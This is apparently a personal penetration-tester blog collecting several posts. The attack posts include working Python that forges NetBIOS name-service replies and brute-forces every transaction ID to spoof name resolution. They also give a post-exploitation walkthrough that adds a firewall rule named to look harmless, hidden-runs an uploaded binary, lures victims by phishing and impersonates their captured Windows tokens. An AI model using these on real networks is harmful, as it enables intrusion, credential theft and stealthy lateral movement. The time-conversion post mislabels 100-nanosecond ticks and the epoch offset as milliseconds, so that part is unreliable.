Windows Time in py!

The unix epoch is 1, January, 1970 apparently that's when all linux/unix computers were born. Windows however likes to think it's a lot older as its "born on date" is 1, January, 1601 it can be a little confusing having to switch between the 2. So I wrote a little script to aid in the process. Its fairly simple but ill go over it.

On linux the time is stored in seconds from midnight, so if for instance I had the number 1337133700 I could input that in python using time.ctime(1337133700) and I would get back 'Tue May 15 22:01:40 2012' .. which must have been one hell of a day.

Anyways on windows its a little different as linux uses a 32bit value and here we use a 64bit value, and rather than seconds its calculated using milliseconds since Jan,1,1601. To convert back and forth is actually really simple. We just take our unix time "1337133700" and add "11644473600" which is the "magic" number of milliseconds between 1601 and 1970. Then we simply multiply by 10000000.. so

(1337133700 + 11644473600) = 12981607300
(12981607300 * 10000000) = 129816073000000000

129816073000000000 = milliseconds since 1601

And that's really it, now most of the time you are not going to see that, however what you are going to see is a hex representation so to convert it simply use.

struct.pack("q", 129816073000000000)
and you will get \x00\x1a\x4d\xd5\x07\x33\xcd\x01

Now you might see something a little different if doing this in the shell but that's just python trying to convert hex into ascii for you... Anyways these are the 2 functions.

import time
import struct
def epoch_to_ms(ct = time.time()):
    print("Input time since Epoch is: %s" % time.ctime(ct))
    ms = (ct + 11644473600) * 10000000
    print("Seconds since Jan, 1 1970: %f" % ct)
    print("Millsec since Jan, 1 1601: %f" % ms)
    pms = struct.pack("q", ms)
    print("Little Endian Hex Value  : %s" % '\\x' + '\\x'.join(x.encode('hex') for x in str(pms)))

def hexms_to_unix(ms_time):
    ms = struct.unpack("q", ms_time)[0]
    ct = (ms / 10000000) - 11644473600
    print("Millsec since Jan, 1 1601: %f" % ms)
    print("Seconds since Jan, 1 1970: %f" % ct)
    print("Input time since Epoch is: %s" % time.ctime(ct))


They both work as you can see here.

Now you might ask yourself, where am I ever going to see that.. well its simple really... ;)

A quick 2 things off subject...
1: I am working on getting another blog setup as blogger really bothers me.
2: The color always helps me, if you don't like it I'm sorry. 

Fun with letsencrypt

So if you haven't heard there is this awesome new thing called letsencrypt. It allows you to make valid signed certificates for pretty much any domain you have. Including dyndns and even afraid.org. So here is a very simple and 100% FREE way to get it up and running with python. First go over to afraid and grab yourself a domain, personally I always liked chickenkiller.com but it doesn't matter there are hundreds to choose from.

I say do this first because its going to take awile for it to propagate with your IP. Mine took atleast a few hours, and if I remember correctly the e-mail took a few hours also... but hey its free ;)

Also quickly while we are on the subject of free stuff grab yourself a free amazon account for a year, you'll need a valid phone number but that's a non issue really.

Now after you sign up for afraid.org and get a domain go to the "Dynamic DNS" menu and at the bottom you will find a wget/curl/direct url script that has your personal url inside. Simply hit this url on whatever box you like and bang you just updated your domain to that ip. "This is why I love afraid fyi" Anyways so now all you need is letsencrypt, I did mine on amazon simply so I didn't have to deal with port forwarding on my router.

Grab a copy from github and read it over, its pretty simple really and after running it the first time to make sure I had all the needed packages I basically just used this command and followed the prompts.

./letsencrypt-auto --no-self-upgrade --register-unsafely-without-email certonly

Now your pem files are stored here /etc/letsencrypt/archive/fancydomain.whatever.com

That's really it your pretty much all set, you can load them into Apache, or Nginx or whatever else you like, however if you are going to do that they have some pretty good self installers so you might want to choose that road.

Anyways, like I said I did mine on my amazon, so I needed to get ssh to forward properly if I wanted to run python locally, thats relatively simple but remember to set GatewayPorts clientspecified in the /etc/sshd_config we will want a reverse forward so ssh -R :8080:127.0.0.1:8080 your_ssh_server

Now as long as you have the firewall configured with amazon or whatever your host might be, and you downloaded your keys from the /etc/letsencrypt/archive/ folder you should be good to go.

For python both of these work :)


import socket, ssl

context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.options = ssl.PROTOCOL_SSLv23
context.load_cert_chain(certfile="/pentest/cert.pem", keyfile="/pentest/privkey.pem")

bindsock = socket.socket()
bindsock.bind(('0.0.0.0', 8080))
bindsock.listen(5)
cnsock, fromaddr = bindsock.accept()
sl = context.wrap_socket(cnsock, server_side=True)
sl.recv(1024)

This one is a little bit less painless.. but remember to move your cert files out of the directory your using as lol

import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 8080), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="/pentest/cert.pem", keyfile="/pentest/privkey.pem", server_side=True)
httpd.serve_forever()


One last thing and regretfully I didn't take screencaps but it does work. Inside your /etc/letsencrypt/archive/yoursite.com there are 4 files.

cert.pem  chain.pem  fullchain.pem  privkey.pem

If you do something like so...

cat cert.pem privkey.pem > both.pem

You can now use the both.pem with metasploit... you can then update your ip on afraid.org to whatever you like... even if its a internal ip! This will also work with stunnel if you do something like so...

echo '[lets_encrypt]
accept = 443
connect = 127.0.0.1:80
cert = /pentest/both.pem' > /etc/stunnel/stunnel.conf

stunnel4 /etc/stunnel/stunnel.conf

Whats so nice about this is stunnel will allow you to use your cert with almost ANYTHING regardless if it uses ssl or not. For instance above I showed you how to use python with ssl support, but if I wanted to I could use stunnel and never have to worry about getting ssl working.

Anyways Enjoy!

4 Pretty Amazing Random Things

So every now and then you come across something that's extremely novel and basic yet changes your very understanding and or thought process on a given subject. I have apparently hit a stroke of good luck this last week, as I came across 2 of them by pure chance. The last one I hinted at a few posts ago and I want to go over it again. I promise you they're not very well known so pay attention and I bet you'll learn something. A fair warning first tho, while each is pretty nifty, I have yet to find them "exploitable" except for maybe the last one... Lets get right down to it.


1: Navigating in linux and windows using the command line. Apparently I wasn't privileged enough to be part of the "in crowd" when everyone was explaining ease of navigation.

pushd: Will store a Directory

popd: Will pop you to the stored Directory

It works in both linux and windows, Ive used it more than once and trust me it does save some time!

2: The second one is somewhat known but still nifty, anytime you put a link in a page that doesn't have a tld at the end, or even if it does and windows cant find it. You're going to be sending out broadcast llmnr and nbns requests to your network looking for it. The really interesting part of this is that since browsers preload dns for "I think" all the links on a page, your going to hitting it no matter what, test it out like so...

<img alt="wow" src="http://wut.">

The way I found this out, is actually via misconfigured javascript on a site and I'm running noscript so think about that...

3: Probably the most interesting, and I already mentioned it before. NetBios 139 does NOT bind to 0.0.0.0. lets take a closer look.

As you can see it binds to your actual IP address, yet does NOT bind to localhost so we can in fact do this...

In addition to that you can see that its running as pid 4 "system", what makes it even more odd is that udp 137 and udp 138 also have the same behavior.


4: If I was to ping google.com the IP would resolve to... 216.58.216.238, and if I went to http://216.58.216.238 I would get a google page, well depending if they change the dns but this address is also the same google page http://3627735278 ... ya now that is interesting. It works in FF, IE, and from the cmdline. The funny part is this is how its expected to work for instance try this.

Anyways if I wanted to go to 127.0.0.1, it would be this 2130706433 I wrote a little script just to mess around with it and you can find it here.

https://github.com/trump0dump/ip_num

So what are the implications of this, well the first thing I tried was hitting a smb path and sadly it doesn't appear to work but my next immediate thought was in any sort of xss that filters for ....

So there you have it 4 randomly cool things, and I bet you learned something :)

NetBios Name Spoofer...

So since Potato recently got a update I decided to put this together. Now you don't need to mess with Responder if you don't want to.. altho you should since its badass! The funny part about this is I actually threw it together in about 20min. Something must be working because I'm improving a lot more recently.

Ill give a little explanation but the code is very very readable and I left plenty of comments in there so you can see whats going on.

This is the insane way of encoding the NetBios name.. So if i was to use WPAD as the example it will look like this
'FHFAEBEECACACACACACACACACACACAAA'

 And if I was to use DISABLEWPADNOW it would look like this.
'EEEJFDEBECEMEFFHFAEBEEEOEPFHCAAA'

def make_nbname(name):
        spoof_name = name.upper()
        encoded_name = ''.join([chr((ord(c)>>4) + ord('A'))
            + chr((ord(c)&0xF) + ord('A')) for c in spoof_name])
        padding = "CA"*(15-len(spoof_name))
        return '\x20' + encoded_name + padding + role[0] 

The '\x20' above ^ is the start of a answer reply, and the role is from this... You can use any one of these, I have not tried them all but I really should.

role = {
        0:"\x41\x41\x00", # :"Workstation/Redirector" # normal
        1:"\x42\x4c\x00", # :"Domain Master Browser"
        2:"\x42\x4d\x00", # :"Domain Controller"
        3:"\x42\x4e\x00", # :"Local Master Browser"
        4:"\x42\x4f\x00", # :"Browser Election"
        5:"\x43\x41\x00", # :"File Server"
        6:"\x41\x42\x00"  # :"Browser"
    }

Here is how we make our packet, I ripped most of it from metasploit..

def make_packet(name, return_ip):
        pkt = '\x00\x00'      # TID better to do it on the fly than call the method over and over
        pkt += "\x85\x00"  # Flags = response + authoritative + recursion desired
        pkt +="\x00\x00"   # Questions = 0
        pkt +="\x00\x01"   # Answer RRs = 1
        pkt +="\x00\x00"   # Authority RRs = 0
        pkt +="\x00\x00"   # Additional RRs = 0
        pkt += make_nbname(name) # original query name
        pkt +="\x00\x20"   # Type = NB ...whatever that means
        pkt +="\x00\x01"   # Class = IN
        pkt += struct.pack('>I', sec) # \x00\x00\x00\xff = 4min 15sec
        pkt +="\x00\x06"   # Datalength = 6
        pkt +="\x00\x00"   # Flags B-node, unique
        pkt += socket.inet_aton(return_ip) # 32bit packed binary, ipv6 uses socket.inet_pton()
        return pkt

The one thing to really pay attention to is the struct part, that is how we encode the (Time To Live) its 4 bytes long and represented in seconds so that 60 seconds will be,  '\x00\x00\x00\x3c' or say 10Minutes will be 10 * 60 = 600Seconds, and 600 in hex is '0x0258' so it would look like this '\x00\x00\x02\x58' .. anyways none of that should matter just define sec = 60 and your good to go. Its defaulted to 255 fyi which is 4min 15seconds :)

The very last part is how the whole thing works, so whenever your computer makes a NBNS request, there is a 2byte TransactionID associated with it. This I guess was supposed to prevent this very thing from happening, or maybe it was designed as a check I'm not sure. Regardless, since its 2bytes there are only 65,535 possible numbers and we simply loop through all of them. On a modern lan this is not a issue, and turns out to roughly 4.4Mbytes of data.

And there you have it, its actually rather easy. I would recommend using Responder for now but if anyone ever needs it this is how its done :)

The code can be found here https://github.com/trump0dump/netbios

Capturing Tokens...

I have been writing a whole bunch of code in C# lately, and I decided to implement something I wrote in c++ a couple months ago. So that's what I'm going to discuss today. Typically if you have access to a network you can do a few things, one of them is you set up a Capture the Hash box. This of course doesn't give you a usable hash, but rather a hash you must crack and then can use for whatever you like, be it smb, wmi etc etc.

So there are a ton of tools to use for capturing crackable hashes and or relaying them, Metasploit, Impacket, and Responder all have one to varying degrees or another. What I'm going to show you is how to take a network authentication and use it locally to get a token. Then we can simply impersonate that with incognito or write our own method to do it. This is what I'm working on in C# at the moment...

So lets assume we have managed to become LOCAL SYSTEM via potato or some other method and we have a meterpreter session on the box. Its on a 2k12 network and nothing else is running so only RPC port 135 is open. I'm going to start by enabling port 80 on the firewall by running this command with meterpreter.

netsh advfirewall firewall add rule name="Inconspicuous Rule Name" dir=in action=allow protocol=TCP localport=80

Then I'm going to upload the little exe I compiled, .. you can find the source on my github but you'll most likely need to modify it as its not built for any sort of production environment.

upload /tmp/awesome32.exe c:\\Windows\\Temp\\awesome32.exe

Now  I'm going to run it simply like so

execute -H -c -f "C:\\Windows\\Temp\\awesome32.exe" -a "0.0.0.0 80" 

I could also drop it directly to memory so as not to touch disk, or I could even write a metasploit module to do everything via railgun!

Now we load incognito, and list all the hashes... obviously its just going to be us on there, so what we need to do is either use the post/windows/escalate/droplnk or send someone a e-mail with our link inside, hell we could even do a little spoofing... The goal obviously is to get someone to connect to us, on port 80 "this requires webclient to be running fyi"... the @ sign in a link really helps out btw so don't be afraid to use it and it also enables you to run it on any other port you like. You also need to remember that windows "should" Not authenticate directly if you don't use a named host.

After someone authenticates we simply list_tokens and then do impersonate_token and we become whoever we like.

Our before...

And after...

I also want to point out something a little odd that I have noticed, I haven't had much time to test it but you should definitely check it out as it has happened on a few occasions. If you have a couple of Impersonation tokens and then you do a windows update... your impersonation tokens become delegation tokens... I'm not exactly sure why, and I haven't really had any luck tracking it down but it happens. I have a feeling that when it does a update for some reason duplicates the token and then sets the ASC_REQ_DELEGATE flag in the attributes but I'm not entirely sure.

Anyways the code can be found here for now, and ill be rewriting it in C# just as soon as I get the chance. There are pretty good comments to go along with it so I don't think i have to explain everything, just go take a look.

https://github.com/trump0dump/helpful/tree/master/tokenc

Learning Hex

A long time ago, almost in another life it seems I had never heard of hex, it was such a difficult concept for me to understand and now its second nature. I guess that's what happens when you stare at Wireshark all day, and start writing intercepting proxy's and such. So anyways long story short my girl asked me a while ago what it was and since I'm actually putting some effort into learning c# I decided to come up with something. A few hours later and I had this.

Its not very useful but it does explain the ascii codes to hex values and my girl was happy with it. Lol if you want to get major bonus points write a exe for your girl ;). Also since this isn't a technical post and doesn't really have much value I'll leave you with this... netbios does not bind to 0.0.0.0 or [::] which could be Very useful in a pivot situation and other things, what is odd is that I have never heard anyone mention it before...

The code is here if you want to take a look https://github.com/trump0dump/helpful/blob/master/simple_hex.cs

Enjoy!